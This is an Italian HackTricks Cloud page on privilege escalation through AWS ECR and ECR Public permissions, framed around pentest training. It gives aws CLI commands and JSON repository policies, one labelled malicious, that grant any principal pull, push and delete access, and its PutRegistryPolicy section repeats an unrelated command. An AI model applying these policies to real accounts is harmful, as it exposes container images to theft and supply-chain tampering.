AWS - ECR Privesc

Impara e pratica l'Hacking su AWS: HackTricks Training AWS Red Team Expert (ARTE) Impara e pratica l'Hacking su GCP: HackTricks Training GCP Red Team Expert (GRTE)

Sostieni HackTricks

Controlla i piani di abbonamento!
Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repository di Github.

ECR

`ecr:GetAuthorizationToken`,`ecr:BatchGetImage`

Un attaccante con i permessi ecr:GetAuthorizationToken e ecr:BatchGetImage può accedere a ECR e scaricare immagini.

Per ulteriori informazioni su come scaricare immagini:

AWS - ECR Post Exploitation

Impatto Potenziale: Privesc indiretto intercettando informazioni sensibili nel traffico.

`ecr:GetAuthorizationToken`, `ecr:BatchCheckLayerAvailability`, `ecr:CompleteLayerUpload`, `ecr:InitiateLayerUpload`, `ecr:PutImage`, `ecr:UploadLayerPart`

Un attaccante con tutti questi permessi può accedere a ECR e caricare immagini. Questo può essere utile per scalare i privilegi ad altri ambienti dove vengono utilizzate tali immagini.

Per imparare come caricare una nuova immagine/aggiornarne una, controlla:

AWS - EKS Enum

`ecr-public:GetAuthorizationToken`, `ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload`, `ecr-public:InitiateLayerUpload, ecr-public:PutImage`, `ecr-public:UploadLayerPart`

Come nella sezione precedente, ma per i repository pubblici.

`ecr:SetRepositoryPolicy`

Un attaccante con questo permesso potrebbe modificare la policy del repository per concedersi (o addirittura a tutti) accesso in lettura/scrittura. Ad esempio, in questo esempio l'accesso in lettura è concesso a tutti.

aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json

Contenuto di my-policy.json:

{
"Version" : "2008-10-17",
"Statement" : [
{
"Sid" : "allow public pull",
"Effect" : "Allow",
"Principal" : "*",
"Action" : [
"ecr:BatchCheckLayerAvailability",
"ecr:BatchGetImage",
"ecr:GetDownloadUrlForLayer"
]
}
]
}

`ecr-public:SetRepositoryPolicy`

Come nella sezione precedente, ma per i repository pubblici. Un attaccante può modificare la policy del repository di un repository ECR Pubblico per concedere accesso pubblico non autorizzato o per aumentare i propri privilegi.

bashCopy code# Create a JSON file with the malicious public repository policy
echo '{
"Version": "2008-10-17",
"Statement": [
{
"Sid": "MaliciousPublicRepoPolicy",
"Effect": "Allow",
"Principal": "*",
"Action": [
"ecr-public:GetDownloadUrlForLayer",
"ecr-public:BatchGetImage",
"ecr-public:BatchCheckLayerAvailability",
"ecr-public:PutImage",
"ecr-public:InitiateLayerUpload",
"ecr-public:UploadLayerPart",
"ecr-public:CompleteLayerUpload",
"ecr-public:DeleteRepositoryPolicy"
]
}
]
}' > malicious_public_repo_policy.json

# Apply the malicious public repository policy to the ECR Public repository
aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json

Impatto Potenziale: Accesso pubblico non autorizzato al repository ECR Public, consentendo a qualsiasi utente di caricare, scaricare o eliminare immagini.

`ecr:PutRegistryPolicy`

Un attaccante con questa autorizzazione potrebbe modificare la policy del registro per concedersi, al suo account (o addirittura a tutti) l'accesso in scrittura/lettura.

aws ecr set-repository-policy \
--repository-name <repo_name> \
--policy-text file://my-policy.json

Impara e pratica l'hacking su AWS: HackTricks Training AWS Red Team Expert (ARTE) Impara e pratica l'hacking su GCP: HackTricks Training GCP Red Team Expert (GRTE)

Sostieni HackTricks

Controlla i piani di abbonamento!
Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
Condividi trucchi di hacking inviando PR a HackTricks e HackTricks Cloud repos di github.

PreviousAWS - EC2 Privesc NextAWS - ECS Privesc

Last updated 1 month ago